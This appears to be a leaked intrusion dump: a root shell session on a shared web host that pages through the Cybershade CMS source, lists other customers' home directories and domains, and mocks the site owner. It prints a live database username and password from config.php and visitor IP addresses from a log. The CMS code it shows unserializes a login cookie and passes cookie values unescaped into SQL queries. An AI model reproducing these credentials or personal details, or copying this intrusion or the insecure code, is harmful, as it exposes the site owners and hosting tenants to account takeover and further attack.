//--Sort out the guests & users online stuff-------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//include($cms_root.'core/usertracker.php');
|
||
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--UserTracker.php--------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
if(!defined('NO_DB') && !defined('NO_LOG')){
|
||
|
||
if(!isset($_SESSION['user']['userkey'])){
|
||
//cookie check
|
||
if(!$_user->is_online){
|
||
if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
|
||
!empty($_COOKIE[$config['db']['ckefix'].'login'])){
|
||
$cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
|
||
if(isset($cookie[1]) && (int)isset($cookie[0])){
|
||
if($cookie[1] ==
|
||
$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
|
||
if($config['login']['autologinIpRestriction']) $aq
|
||
= " AND user_ip = '".getIP()."'";
|
||
$query = $_sql->getTable("SELECT uid FROM
|
||
".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
|
||
= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
|
||
if (count($query) == 1){
|
||
$user = $_sql->getTable("SELECT timestamp
|
||
FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
|
||
if($user!==NULL){
|
||
$user = $user[0];
|
||
|
||
$_sess->set_sessions($cookie[0]);
|
||
|
||
$_SESSION['user']['last_visit']
|
||
= $user['timestamp'];
|
||
$_user->new_user($cookie[0], 'alogin');
|
||
|
||
|
||
if($_user->get_new_threads($_SESSION['user']['last_visit']))
|
||
setNotification('We have just updated your
|
||
forum icons to reflect new posts.', 'Forum Icons Updated', false,
|
||
$_SESSION['user']['id']);
|
||
$config['global']['user']['id'] =
|
||
$_SESSION['user']['id'];
|
||
}
|
||
}else{//if count query == 1
|
||
setcookie($config['db']['ckefix']."login",
|
||
null, time() - 31536000); //set cookie to remember me
|
||
|
||
unset($_COOKIE[$config['db']['ckefix']."login"]);
|
||
}
|
||
}else{ //if cookie == http user agent
|
||
setcookie($config['db']['ckefix']."login",
|
||
null, time() - 31536000); //set cookie to remember me
|
||
|
||
unset($_COOKIE[$config['db']['ckefix']."login"]);
|
||
}
|
||
}else{//if cookie info == valid
|
||
setcookie($config['db']['ckefix']."login", null, time()
|
||
- 31536000); //set cookie to remember me
|
||
unset($_COOKIE[$config['db']['ckefix']."login"]);
|
||
}
|
||
redirect($_SERVER["PHP_SELF"]);
|
||
|
||
}
|
||
}
|
||
$_user->new_user($config['global']['user']['id']);
|
||
}else{
|
||
$return = $_user->update_location();
|
||
if($return == 0){
|
||
$_user->new_user($config['global']['user']['id']);
|
||
}
|
||
}
|
||
|
||
}
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--UserTracker.php--------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
/**
|
||
* Thanks to Jesus for this baby, this will add the level of sanitation
|
||
required for the diffrent data types
|
||
*/
|
||
function secureit($string, $type=''){
|
||
switch($type){
|
||
case 'post':
|
||
$string = mysql_real_escape_string($string);
|
||
break;
|
||
default:
|
||
$string = mysql_real_escape_string($string);
|
||
$string = htmlentities($string);
|
||
$string = stripslashes($string);
|
||
$string = strip_tags($string);
|
||
break;
|
||
}
|
||
return $string;
|
||
}
|
||
if (isset($_GET['code']) &&
|
||
$_user->check_permissions($config['global']['user']['id'], DEV)) {
|
||
$explode = explode('/', $_SERVER['PHP_SELF']);
|
||
die(highlight_file($explode[count($explode)-1], 1));
|
||
}
|
||
?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
|
||
core]# less Gre.php
|
||
<?php
|
||
/*======================================================================*\
|
||
| Cybershade CMS - Your CMS, Your Way. |
|
||
\*======================================================================*/
|
||
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
|
||
|
||
error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
|
||
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
|
||
//this is to start the generation timer off
|
||
$gen_time = microtime();
|
||
|
||
//Include the session stuff
|
||
if(!SMODE) require($cms_root."core/classes/class.session.php");
|
||
if(SMODE) require($cms_root."core/classes/classes.php");
|
||
$_sess = new session;
|
||
|
||
//Set the headers
|
||
header("Cache-control: private");
|
||
header("Content-Type: text/html; charset=utf-8");
|
||
//ob_start("ob_gzhandler");
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Include the core CMS files needed -------------------------------------//
|
||
core.php
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
:
|
||
://The config files
|
||
:require($cms_root."core/config.php");
|
||
:
|
||
:/*this is the ultimate cache-er xD, k so basically u got
|
||
: * the var below which "allows" the static cacher through
|
||
: */
|
||
:
|
||
:#$allow = true;
|
||
:
|
||
://this little switch decided what should be auto cache'd
|
||
:/*switch(CMS_MENU){
|
||
: case 'forum': $allow = false; break;
|
||
: case 'admin': $allow = false; break;
|
||
: case 'ucp': $allow = false; break;
|
||
: case 'login': $allow = false; break;
|
||
: case 'main': $allow = false; break;
|
||
: case 'pm': $allow = false; break;
|
||
: default: $allow = true; break;
|
||
:}
|
||
:
|
||
:if($allow){
|
||
: // Get the modification date of this PHP file
|
||
: $timestamps = array(@getlastmod());
|
||
:
|
||
: // The latest of these modification dates is our real Last-Modified date
|
||
: $timestamp = max($timestamps);
|
||
:
|
||
: // Note that this is not a RFC 822 date (the tz is always GMT)
|
||
: $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
|
||
:
|
||
: // Check if the client has the same page cached
|
||
: if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
|
||
: ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
|
||
: header("HTTP/1.1 304 Not Modified");
|
||
: exit();
|
||
: }
|
||
: // Inform the user what is our last modification date
|
||
: else {
|
||
: header("Last-Modified: " . $tsstring);
|
||
: }
|
||
:}*/
|
||
:
|
||
://The class files
|
||
:require($cms_root."core/classes/class.sql.php");
|
||
:if(!SMODE)require($cms_root."core/classes/class.login.php");
|
||
:if(!SMODE)require($cms_root."core/classes/class.user.php");
|
||
:if(!SMODE)require($cms_root."core/classes/class.form.php");
|
||
:if(!SMODE)require($cms_root."core/classes/class.time.php");
|
||
:require($cms_root."core/classes/class.nbbc.php");
|
||
:require($cms_root."core/classes/class.tpl.php");
|
||
:if(!SMODE)require($cms_root."core/classes/class.cache.php");
|
||
:require($cms_root."core/classes/class.geshi.php");
|
||
:
|
||
://The base functions
|
||
:require($cms_root."core/base_functions.php");
|
||
:
|
||
://///////////////////////////////////////////////////////////////////////////
|
||
://--Sort out the cached config stuff---------------------------------------//
|
||
://///////////////////////////////////////////////////////////////////////////
|
||
:$config_db = array();
|
||
://check see if the config file exists, if not then just create a blank config
|
||
va
|
||
:riable
|
||
:if(file_exists($cms_root."cache/cache_config.php")){ include
|
||
$cms_root."cache/ca
|
||
:che_config.php"; }
|
||
:
|
||
://If the config_db is not null, cached.. then use it.
|
||
:if($config_db !== NULL){
|
||
: foreach($config_db as $array){
|
||
: $config[$array['array']][$array['var']] = $array['value'];
|
||
: }
|
||
: unset($array);
|
||
:}
|
||
:
|
||
:if(isset($_GET['_site'])){
|
||
: $a=(isset($_GET['_site']) ? $_GET['_site'] :
|
||
(isset($_SESSION['site']['mode'
|
||
:]) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
|
||
: switch($a){
|
||
: case 'dmz':
|
||
: $_SESSION['site']['mode'] = 'dmz_';
|
||
: break;
|
||
: case 'cs':
|
||
: $_SESSION['site']['mode'] = 'cs_';
|
||
: break;
|
||
: default:
|
||
: }
|
||
:}
|
||
:if(isset($_SESSION['site']['mode']))
|
||
: $config['db']['prefix'] = $_SESSION['site']['mode'];
|
||
:
|
||
://///////////////////////////////////////////////////////////////////////////
|
||
://--Define new instances of required classes-------------------------------//
|
||
://///////////////////////////////////////////////////////////////////////////
|
||
://start the sql
|
||
:$_sql = new sql(true);
|
||
:$_sql->config = $config;
|
||
:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
|
||
:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
|
||
:
|
||
:
|
||
://Open the session stuff
|
||
:$_sess->sql = $_sql;
|
||
:$_sess->config = $config;
|
||
:
|
||
://start the form class
|
||
:$_form = new form;
|
||
:
|
||
://start the user class
|
||
:$_user = new user;
|
||
:$_user->config = $config;
|
||
:$_user->sql = $_sql;
|
||
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
|
||
|
||
# RoMeO's butt buddy xlink aka mad php c0d3r
|
||
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
|
||
ls -al
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 23 14:31 .htpasswd
|
||
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
|
||
drwx--x--x 3 romeo romeo 4096 Dec 23 14:31 public_ftp
|
||
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
|
||
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
|
||
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
|
||
cd public_html/
|
||
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
|
||
public_html]# ls -al
|
||
total 1188
|
||
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 .
|
||
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 ..
|
||
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 400.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 401.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 403.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 404.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 500.shtml
|
||
-rw-r--r-- 1 romeo romeo 5254 Feb 16 08:01 acp.php
|
||
-rw-r--r-- 1 romeo romeo 9757 Feb 16 08:01 ajax.php
|
||
-rw-r--r-- 1 romeo romeo 2118 Feb 16 08:01 articles.php
|
||
drwxrwxrwx 5 romeo romeo 4096 Feb 10 19:31 cache
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 cgi-bin
|
||
-rw-r--r-- 1 romeo romeo 5561 Feb 16 08:01 challenges.php
|
||
-rw-r--r-- 1 romeo romeo 466963 Mar 1 14:51 cms_docs.zip
|
||
-rw-r--r-- 1 romeo romeo 2137 Feb 10 19:31 codebase.php
|
||
-rw-r--r-- 1 romeo romeo 17251 Feb 10 19:31 convertor.php
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 core
|
||
-rw-r--r-- 1 romeo romeo 0 Feb 10 19:31 debug
|
||
-rw-r--r-- 1 romeo romeo 3266 Feb 10 19:31 eg.gif
|
||
-rw-r--r-- 1 romeo romeo 28213 Mar 20 12:59 farm.php
|
||
-rw-r--r-- 1 romeo romeo 5020 Feb 16 08:01 forgotpass.php
|
||
-rw-r--r-- 1 romeo romeo 7097 Feb 19 14:12 forum.php
|
||
-rw-r--r-- 1 romeo romeo 2110 Feb 16 08:01 get_shouts.php
|
||
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:12 .htaccess
|
||
-rw-r--r-- 1 romeo romeo 36 Feb 10 19:31 .htpasswd
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 images
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 img
|
||
-rw-r--r-- 1 romeo romeo 3998 Feb 16 08:01 index.php
|
||
-rw-r--r-- 1 romeo romeo 843 Feb 16 08:01 irc.php
|
||
drwxr-xr-x 3 romeo romeo 4096 Feb 10 19:31 language
|
||
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:12 latest_posts.php
|
||
-rwxr-xr-x 1 romeo romeo 7184 Feb 16 08:01 loader.php
|
||
-rw-r--r-- 1 romeo romeo 8398 Feb 16 08:01 login.php
|
||
-rwxr-xr-x 1 romeo romeo 13954 Feb 10 19:31 logo.jpg
|
||
-rw-r--r-- 1 romeo romeo 3006 Feb 16 08:01 merge.php
|
||
drwxr-xr-x 20 romeo romeo 4096 Feb 17 09:01 modules
|
||
-rw-r--r-- 1 romeo romeo 10964 Feb 16 08:01 pastebin.php
|
||
-rw-r--r-- 1 romeo romeo 35466 Feb 19 14:39 post.php
|
||
-rw-r--r-- 1 romeo romeo 2142 Feb 16 08:01 privatemessages.php
|
||
-rw-r--r-- 1 romeo romeo 9755 Feb 21 09:08 register.php
|
||
-rw-r--r-- 1 romeo romeo 7986 Feb 16 08:01 rss.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 scripts
|
||
-rw-r--r-- 1 romeo romeo 1065 Feb 16 08:01 search.php
|
||
-rw-r--r-- 1 romeo romeo 1838 Feb 16 08:01 settings.php
|
||
drwxr-xr-x 8 romeo romeo 4096 Mar 19 10:13 skin
|
||
-rw-r--r-- 1 romeo romeo 196608 Mar 19 10:20 skin.tgz
|
||
-rw-r--r-- 1 romeo romeo 636 Feb 16 08:01 staff.php
|
||
-rw-r--r-- 1 romeo romeo 133049 May 23 04:00 stress_test.txt
|
||
-rw-r--r-- 1 romeo romeo 994 Feb 10 19:31 swiigle_upload.php
|
||
drwxr-xr-x 5 romeo romeo 4096 Feb 16 19:13 template
|
||
-rw-r--r-- 1 romeo romeo 454 Feb 10 19:31 template.php
|
||
-rw-r--r-- 1 romeo romeo 590 Feb 10 19:31 test.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 txt docs
|
||
-rw-r--r-- 1 romeo romeo 2708 Feb 16 08:01 ucp.php
|
||
-rw-r--r-- 1 romeo romeo 8546 Feb 19 14:12 view_group.php
|
||
-rw-r--r-- 1 romeo romeo 876 Feb 16 08:01 view_profile.php
|
||
-rw-r--r-- 1 romeo romeo 12838 Feb 19 14:12 view_topic.php
|
||
-rw-r--r-- 1 romeo romeo 9571 Feb 16 08:01 windowed_options.php
|
||
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
|
||
public_html]# cd core
|
||
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
|
||
core]# ls -al
|
||
total 164
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 .
|
||
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 ..
|
||
-rw-r--r-- 1 romeo romeo 731 Feb 10 19:31 admin.js
|
||
-rw-r--r-- 1 romeo romeo 27175 Feb 16 19:00 base_functions.php
|
||
-rw-r--r-- 1 romeo romeo 9266 Feb 16 19:00 bbcode_tags.php
|
||
-rw-r--r-- 1 romeo romeo 2816 Feb 10 19:31 cacher.php
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 classes
|
||
-rw-r--r-- 1 romeo romeo 1376 Feb 16 19:00 cli.php
|
||
-rw-r--r-- 1 romeo romeo 2847 Feb 10 19:33 config.php
|
||
-rw-r--r-- 1 romeo romeo 23727 Feb 17 09:53 core.php
|
||
-rw-r--r-- 1 romeo romeo 4518 Feb 10 19:31 cron.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 err
|
||
-rw-r--r-- 1 romeo romeo 236 Feb 16 19:00 force_user.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 functions
|
||
-rw-r--r-- 1 romeo romeo 1181 Feb 16 19:00 key.php
|
||
-rw-r--r-- 1 romeo romeo 6903 Feb 16 19:00 mailer.php
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 mint
|
||
-rw-r--r-- 1 romeo romeo 3054 Feb 16 19:00 page_footer.php
|
||
-rw-r--r-- 1 romeo romeo 6429 Feb 16 19:00 page_header.php
|
||
-rw-r--r-- 1 romeo romeo 9762 Feb 16 19:00 recaptchalib.php
|
||
-rw-r--r-- 1 romeo romeo 6601 Apr 5 12:58 security.php
|
||
-rw-r--r-- 1 romeo romeo 2760 Feb 16 19:00 usertracker.php
|
||
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
|
||
core]# less config.php
|
||
<?php
|
||
//Cybershade.Org
|
||
|
||
//Database Stuff
|
||
$config['db']['host'] = 'localhost';
|
||
$config['db']['username'] = 'romeo_romeo';
|
||
$config['db']['password'] = 'swU55ath';
|
||
$config['db']['database'] = 'romeo_DMZ_CS';
|
||
$config['db']['prefix'] = 'cs_';
|
||
$config['db']['shrfix'] = 'shr_'; //the prefix
|
||
f
|
||
or the shared tables
|
||
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
|
||
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
|
||
|
||
is also a good way to invalidate the autologins on cms update
|
||
$config['site']['working_dir'] = '';
|
||
|
||
//config vars for if we loose the DB
|
||
$config['cms']['name'] = 'DarkMindZ';
|
||
$config['cms']['version'] = '_DDoS';
|
||
$config['cms']['debug'] = "0";
|
||
$config['site']['title'] = 'CyberShade CMS';
|
||
$config['site']['theme'] = 'cs';
|
||
$config['site']['language'] = 'en';
|
||
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
|
||
public_html]# less stress_test.txt
|
||
/codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 -
|
||
PAGETime
|
||
r: -0.83011 |
|
||
/register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer:
|
||
0.2
|
||
6816 |
|
||
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer:
|
||
0.1065
|
||
6 |
|
||
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer:
|
||
0.0528
|
||
6 |
|
||
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer:
|
||
0.0420
|
||
1 |
|
||
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer:
|
||
0.0522
|
||
9 |
|
||
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer:
|
||
0.0435
|
||
5 |
|
||
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer:
|
||
0.0514
|
||
6 |
|
||
/forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime:
|
||
|
||
30.93873 - PAGETimer: 0.2404 |
|
||
/forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 -
|
||
PAGET
|
||
imer: 0.09753 |
|
||
/codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime:
|
||
13.306
|
||
77 - PAGETimer: 0.11182 |
|
||
/ - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
|
||
root@server2:~[root@server2 ~]# cd /home
|
||
root@server2:/home[root@server2 home]# ls -la
|
||
total 152
|
||
drwx--x--x 36 root root 4096 May 23 02:33 .
|
||
drwx--x--x 25 root root 4096 May 22 09:26 ..
|
||
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 aaa
|
||
drwx--x--x 6 admin admin 4096 Jan 12 14:29 admin
|
||
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 beyond
|
||
drwx--x--x 4 bloo bloo 4096 May 23 02:04 bloo
|
||
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 bootroot
|
||
drwx------ 2 clamav clamav 4096 Apr 1 22:35 clamav
|
||
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 dablitz
|
||
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 dakilla
|
||
drwxr-xr-x 2 root root 4096 Dec 3 2007 ftp
|
||
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
|
||
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 h3mod
|
||
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 haiobr
|
||
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 hbxmike
|
||
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 hotglow
|
||
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 hrdev
|
||
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 hstrike
|
||
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 kaza
|
||
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
|
||
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 mrgod
|
||
drwx--x--x 5 odin odin 4096 May 8 05:01 odin
|
||
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 pagewiz
|
||
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 penguin
|
||
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 pimpinjg
|
||
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ristop
|
||
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 romeo
|
||
drwx--x--x 4 sam sam 4096 May 12 09:26 sam
|
||
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 scraft758
|
||
drwx------ 2 546 547 4096 May 23 02:33 test
|
||
drwxrwxrwt 2 root root 4096 May 23 03:36 tmp
|
||
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 wheelglow
|
||
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 wtfsmilez
|
||
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 xckx
|
||
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 yourkicks
|
||
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 zer0
|
||
root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
|
||
/home/aaa/domains/:
|
||
total 12
|
||
drwx--x--x 3 aaa aaa 4096 Sep 14 2007 .
|
||
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
|
||
drwx--x--x 8 aaa aaa 4096 Sep 14 2007 aaasoda.com
|
||
|
||
/home/admin/domains/:
|
||
total 20
|
||
drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
|
||
drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
|
||
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended
|
||
|
||
/home/beyond/domains/:
|
||
total 12
|
||
drwx--x--x 3 beyond beyond 4096 Sep 12 2007 .
|
||
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
|
||
drwx--x--x 8 beyond beyond 4096 Feb 6 2008 beyond-comparison.com
|
||
|
||
/home/bloo/domains/:
|
||
total 12
|
||
drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
|
||
drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
|
||
drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com
|
||
|
||
/home/bootroot/domains/:
|
||
total 20
|
||
drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
|
||
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
|
||
drwx--x--x 8 bootroot bootroot 4096 May 9 18:57 bootforfun.com
|
||
drwx--x--x 7 bootroot bootroot 4096 Mar 2 00:11 bootforfun.net
|
||
drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org
|
||
|
||
/home/dablitz/domains/:
|
||
total 16
|
||
drwx--x--x 4 dablitz dablitz 4096 Jan 3 23:34 .
|
||
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
|
||
drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
|
||
drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
|
||
/home/dakilla/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
|
||
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
|
||
drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com
|
||
|
||
/home/furiogamin/domains/:
|
||
total 20
|
||
drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
|
||
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
|
||
drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
|
||
drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
|
||
drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net
|
||
|
||
/home/h3mod/domains/:
|
||
total 12
|
||
drwx--x--x 3 h3mod h3mod 4096 Jan 18 2008 .
|
||
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
|
||
drwx--x--x 8 h3mod h3mod 4096 Oct 2 2008 h3mod.com
|
||
|
||
/home/haiobr/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 haiobr haiobr 4096 May 1 14:26 .
|
||
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
|
||
drwxr-xr-x 9 haiobr haiobr 4096 May 1 14:26 super-syn.net
|
||
|
||
/home/hbxmike/domains/:
|
||
total 16
|
||
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
|
||
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
|
||
drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
|
||
drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz
|
||
|
||
/home/hotglow/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 hotglow hotglow 4096 Sep 3 2007 .
|
||
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
|
||
drwxr-xr-x 8 hotglow hotglow 4096 Sep 3 2007 hotglowneon.com
|
||
|
||
/home/hrdev/domains/:
|
||
total 12
|
||
drwxr-xr-x 3 hrdev hrdev 4096 Dec 2 19:31 .
|
||
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
|
||
drwxr-xr-x 8 hrdev hrdev 4096 Dec 10 2007 hr-development.net
|
||
|
||
/home/hstrike/domains/:
|
||
total 12
|
||
drwx--x--x 3 hstrike hstrike 4096 Apr 24 2008 .
|
||
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
|
||
drwx--x--x 8 hstrike hstrike 4096 Oct 31 2008 halostrike.com
|
||
|
||
/home/kaza/domains/:
|
||
total 28
|
||
drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
|
||
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
|
||
drwx--x--x 7 kaza kaza 4096 Jan 6 21:14 crypticgamers.com
|
||
drwx--x--x 7 kaza kaza 4096 Jan 5 21:13 crypticgamers.net
|
||
drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
|
||
drwx--x--x 7 kaza kaza 4096 May 4 08:50 kindclan.co.cc
|
||
drwx--x--x 7 kaza kaza 4096 Feb 4 00:10 mortonnetworks.com
|
||
|
||
/home/keytraderz/domains/:
|
||
total 20
|
||
drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
|
||
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 5 21:20 1nesolution.com
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
|
||
drwx--x--x 8 keytraderz keytraderz 4096 Jan 2 21:15 keytraderz.com
|
||
|
||
/home/mrgod/domains/:
|
||
total 12
|
||
drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
|
||
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
|
||
drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net
|
||
|
||
/home/odin/domains/:
|
||
total 12
|
||
drwx--x--x 3 odin odin 4096 May 2 04:09 .
|
||
drwx--x--x 5 odin odin 4096 May 8 05:01 ..
|
||
drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws
|
||
|
||
/home/pagewiz/domains/:
|
||
total 12
|
||
drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
|
||
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
|
||
drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com
|
||
|
||
/home/penguin/domains/:
|
||
total 12
|
||
drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
|
||
drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 ..
|
||
drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com
|
||
|
||
/home/pimpinjg/domains/:
|
||
total 16
|
||
drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
|
||
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
|
||
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
|
||
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com
|
||
|
||
/home/ristop/domains/:
|
||
total 12
|
||
drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
|
||
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
|
||
drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com
|
||
|
||
/home/romeo/domains/:
|
||
total 16
|
||
